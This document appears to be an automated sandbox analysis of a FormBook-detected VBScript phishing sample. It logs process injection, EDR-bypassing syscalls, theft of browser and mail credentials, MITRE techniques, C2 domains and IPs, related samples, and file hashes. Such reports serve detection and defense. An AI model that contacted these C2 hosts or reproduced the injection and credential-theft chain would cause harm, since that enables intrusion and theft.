Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Section loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: execute and read and write
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and write
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, Section loaded: NULL target: C:\Windows\SysWOW64\SearchProtocolHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Section loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Section loaded: NULL target: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Thread register set: target process: 8052
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Thread APC queued: target process: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BC8008
Source: C:\Windows\System32\wscript.exe, Process created: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe"
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe, Process created: C:\Windows\SysWOW64\SearchProtocolHost.exe "C:\Windows\SysWOW64\SearchProtocolHost.exe"
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, Queries volume information: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe VolumeInformation
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (rendered as an interactive table in the original report; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques flagged for this sample: Scripting; Exploitation for Client Execution; Process Injection; Masquerading; OS Credential Dumping; Security Software Discovery; Email Collection; Encrypted Channel; DLL Side-Loading; Abuse Elevation Control Mechanism; Disable or Modify Tools; Process Discovery; Archive Collected Data; Ingress Tool Transfer; Virtualization/Sandbox Evasion; Data from Local System; Non-Application Layer Protocol; Application Window Discovery; Application Layer Protocol; Deobfuscate/Decode Files or Information; File and Directory Discovery; System Information Discovery; Obfuscated Files or Information; Software Packing.
Behavior Graph (ID: 1566711, Sample: PO_1111101161.vbs, Startdate: 02/12/2024, Architecture: WINDOWS, Score: 100; rendered as an interactive graph in the original report).
Process chain: wscript.exe (signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found) drops C:\Users\user\AppData\...\p_Cm7afCdw.exe (PE32) and starts it. p_Cm7afCdw.exe (Antivirus detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 2 other signatures) starts RegAsm.exe. RegAsm.exe (Maps a DLL or memory area into another process) injects into IGcdoWhymz.exe (Maps a DLL or memory area into another process; Found direct / indirect Syscall (likely to bypass EDR)), which starts SearchProtocolHost.exe (Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures). SearchProtocolHost.exe injects into IGcdoWhymz.exe (Found direct / indirect Syscall (likely to bypass EDR)) and starts firefox.exe.
Network: www.duwixushx.xyz (156.251.17.224, ports 49825 and 80, POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles; Performs DNS queries to domains with low reputation), www.yvcp3.info, 1hong.pels5zqo.shop (129.226.153.85, ports 49862, 49868, 49875, TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN, Singapore) and 3 other IPs or domains. Graph-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures.

Source | Detection | Scanner | Label
PO_1111101161.vbs | 18% | ReversingLabs | Script-WScript.Trojan.AgentTesla

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe | 100% | Joe Sandbox ML |

No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Reputation
www.guacamask.online | 208.91.197.27 | true | true | unknown
1hong.pels5zqo.shop | 129.226.153.85 | true | true | unknown
www.yvcp3.info | 47.254.140.255 | true | true | unknown
www.supernutra01.online | 104.21.24.198 | true | false | high
www.duwixushx.xyz | 156.251.17.224 | true | true | unknown
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | high
www.1qcczjvh2.autos | unknown | unknown | false | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
156.251.17.224 | www.duwixushx.xyz | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
208.91.197.27 | www.guacamask.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
47.254.140.255 | www.yvcp3.info | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true
129.226.153.85 | 1hong.pels5zqo.shop | Singapore | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true
104.21.24.198 | www.supernutra01.online | United States | 13335 | CLOUDFLARENETUS | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1566711
                              Start date and time:2024-12-02 15:52:09 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO_1111101161.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@9/4@5/5
                              EGA Information:
                              • Successful, ratio: 83.3%
                              HCA Information:
                              • Successful, ratio: 87%
                              • Number of executed functions: 79
                              • Number of non-executed functions: 244
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: PO_1111101161.vbs
Time | Type | Description
09:54:35 | API Interceptor | 1416763x Sleep call for process: SearchProtocolHost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
156.251.17.224 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.duwixushx.xyz/q0vk/
156.251.17.224 | DOC_114542366.vbe | malicious | FormBook | www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
208.91.197.27 | specifications.exe | malicious | FormBook, PureLog Stealer | www.cortisalincontrol.net/cbfz/
208.91.197.27 | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | www.joeltcarpenter.online/9pyp/
208.91.197.27 | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | www.cortisalincontrol.net/cbfz/
208.91.197.27 | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | www.matteicapital.online/hyyd/
208.91.197.27 | FATURA.exe | malicious | FormBook | www.martaschrimpf.info/qr9f/
208.91.197.27 | Quotation sheet.exe | malicious | FormBook, PureLog Stealer | www.matteicapital.online/hyyd/
208.91.197.27 | file.exe | malicious | FormBook, PureLog Stealer | www.regislemberthe.online/1y0g/
208.91.197.27 | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | www.614genetics.online/ftvk/
208.91.197.27 | TAX INVOICE.exe | malicious | FormBook | www.martaschrimpf.info/qr9f/
208.91.197.27 | PO #2411071822.exe | malicious | FormBook | www.matteicapital.online/hyyd/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.yvcp3.info | DOC_114542366.vbe | malicious | FormBook | 47.254.140.255
www.guacamask.online | DOC_114542366.vbe | malicious | FormBook | 208.91.197.27
1hong.pels5zqo.shop | attached order.exe | malicious | FormBook, PureLog Stealer | 43.163.1.110
1hong.pels5zqo.shop | DOC_114542366.vbe | malicious | FormBook | 43.163.1.110
s-part-0035.t-0009.t-msedge.net | New Order.xls | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | RFQ_PX2_MULE2024_Travco_Engineering_Construction_PDF.exe | malicious | Remcos | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 021337ISOGENERAL.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://a.rs6.net/1/pc?ep=e4f2f4ad2c30fbb2SK2ZyQxbsE02cV3UOfuPD-JxSRgUD6Y86mFtUF3WRqjeuMrz9o3Xbb320wCTDsWWUHuFG0qWroCiniptiREBdHyyzdrPc45m6t-HBEB7SZ8gZX4dYr4o80JwDUJz1eSGQlrcb9as_P_3jZu-t-DrRTdQARm9vPjp5IAqdyzm4bLxpaVnP8_0eRiLoUggvzge&c=$%7bContact.encryptedContactId%7d | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://secure_sharing0utlook.wesendit.com/dl/ON6fQWpNLtFc53e1u/bWlrZS5zbGVpZ2h0QGtlbXRpbGUuY28udWs | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | file.exe | malicious | LummaC Stealer | 13.107.246.63
www.duwixushx.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 156.251.17.224
www.duwixushx.xyz | DOC_114542366.vbe | malicious | FormBook | 156.251.17.224
www.supernutra01.online | PAYMENT_ADVICE.exe | malicious | FormBook | 104.21.24.198
www.supernutra01.online | Payment-251124.exe | malicious | FormBook | 104.21.24.198
www.supernutra01.online | DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 104.21.24.198
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | CV Lic H&S Olivetti Renzo.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | Project Breakdown Doc.exe | malicious | FormBook | 172.67.220.36
www.supernutra01.online | DOC_114542366.vbe | malicious | FormBook | 172.67.220.36
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 101.35.209.183
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | 101.35.209.183
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | botx.m68k.elf | malicious | Mirai | 162.62.116.233
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | m68k.elf | malicious | Mirai, Moobot | 101.32.73.21
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | loligang.mips.elf | malicious | Mirai | 162.62.73.78
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | https://zfrmz.com/mH78Gmbnl9SICcogz2hN | malicious | HTMLPhisher | 170.106.97.198
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | mpsl.elf | malicious | Mirai | 101.34.151.45
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | la.bot.arm.elf | malicious | Unknown | 101.33.132.16
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | https://vectaire.doclawfederal.com/uDLtT/ | malicious | HTMLPhisher | 49.51.77.119
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | apep.m68k.elf | malicious | Unknown | 101.34.126.81
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | x86_32.nn.elf | malicious | Mirai, Okiru | 47.74.205.199
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | sora.mips.elf | malicious | Mirai | 47.56.146.36
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | sh4.elf | malicious | Mirai, Moobot | 8.215.228.204
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | spc.elf | malicious | Mirai, Moobot | 8.218.63.156
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | arm.elf | malicious | Mirai | 47.91.26.146
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | file.ps1 | malicious | LummaC Stealer | 149.129.12.34
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | botx.m68k.elf | malicious | Mirai | 47.240.238.141
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | loligang.mips.elf | malicious | Mirai | 47.52.22.235
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://sandisk2.oss-ap-northeast-2.aliyuncs.com | malicious | Unknown | 149.129.12.34
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | nabx86.elf | malicious | Unknown | 47.89.129.239
POWERLINE-AS-APPOWERLINEDATACENTERHK | CCE 30411252024.exe | malicious | FormBook | 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | sh4.nn.elf | malicious | Mirai, Okiru | 154.209.101.20
POWERLINE-AS-APPOWERLINEDATACENTERHK | powerpc.nn.elf | malicious | Mirai, Okiru | 156.230.73.250
POWERLINE-AS-APPOWERLINEDATACENTERHK | mpsl.elf | malicious | Mirai | 156.253.186.202
POWERLINE-AS-APPOWERLINEDATACENTERHK | la.bot.arm.elf | malicious | Mirai | 45.13.160.66
POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.mpsl.elf | malicious | Mirai | 154.220.159.10
POWERLINE-AS-APPOWERLINEDATACENTERHK | botx.m68k.elf | malicious | Mirai | 154.203.73.133
POWERLINE-AS-APPOWERLINEDATACENTERHK | botx.sh4.elf | malicious | Mirai | 154.218.51.85
POWERLINE-AS-APPOWERLINEDATACENTERHK | arm7.elf | malicious | Mirai | 156.251.7.143
POWERLINE-AS-APPOWERLINEDATACENTERHK | x86.elf | malicious | Mirai | 156.242.206.41
CONFLUENCE-NETWORK-INCVG | Proforma invoice - Arancia NZ.exe | malicious | FormBook | 208.91.197.39
CONFLUENCE-NETWORK-INCVG | https://url.uk.m.mimecastprotect.com/s/lJtaCvgKLI76mPoHQfgHQcCL-?domain=cognitoforms.com | malicious | HTMLPhisher | 208.91.197.132
CONFLUENCE-NETWORK-INCVG | specifications.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | 1k24tbb-00241346.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | ARRIVAL NOTICE.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | W3MzrFzSF0.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | FATURA.exe | malicious | FormBook | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | Quotation sheet.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | file.exe | malicious | FormBook, PureLog Stealer | 208.91.197.27
CONFLUENCE-NETWORK-INCVG | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 208.91.197.27
                              No context
                              No context
                              Process:C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):226
                              Entropy (8bit):5.360398796477698
                              Encrypted:false
                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                              MD5:3A8957C6382192B71471BD14359D0B12
                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                              Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                              Category:modified
                              Size (bytes):196608
                              Entropy (8bit):1.1215420383712111
                              Encrypted:false
                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\wscript.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):180
                              Entropy (8bit):5.116525900210071
                              Encrypted:false
                              SSDEEP:3:aAf/4srWfQV7KLuvlFAfnnfy9JCB/WDerbJSRE2J5xAInOkANFAfnnf18SwAe:aAf/4safjcHAfnfy9JCUe0i23fnTAvA2
                              MD5:5074C482514538A496FC0262B774CAA5
                              SHA1:36D44D9988D16A010E783011D30C8011754563C4
                              SHA-256:562434FA20681B9D3ED1C3A32EAC097053FAEC8819C256F682E0ADD5898F1E6A
                              SHA-512:12BDD0367C2DCC8B5C20D13C1CCFD8E9DA6AD1308488987136688D874DF3F81CFD469A3FAE17B7F230E3A000FE8AE2A440497ABA666E67BFD1E2866E75054519
                              Malicious:false
                              Preview:02/12/2024 09:53:20 - INFO: Setup done...02/12/2024 09:53:43 - INFO: File cleaned: C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe..02/12/2024 09:53:43 - INFO: Teardown done...
                              Process:C:\Windows\System32\wscript.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):396288
                              Entropy (8bit):7.974699156321406
                              Encrypted:false
                              SSDEEP:12288:1nbeASreBVj5+TXScU4vqcbBU0VhVKMUbbqR:Jb7Sre1+D0MRbW0VjDKqR
                              MD5:5E4094C909CCCBA80D844F553391F9F2
                              SHA1:8C4A46703D6110F4B57EFB990DAA8A8A59C8E469
                              SHA-256:52F879013B5C8431C347AF65A8365F040D83302D5FD9F805CD4D97CC26FCBF98
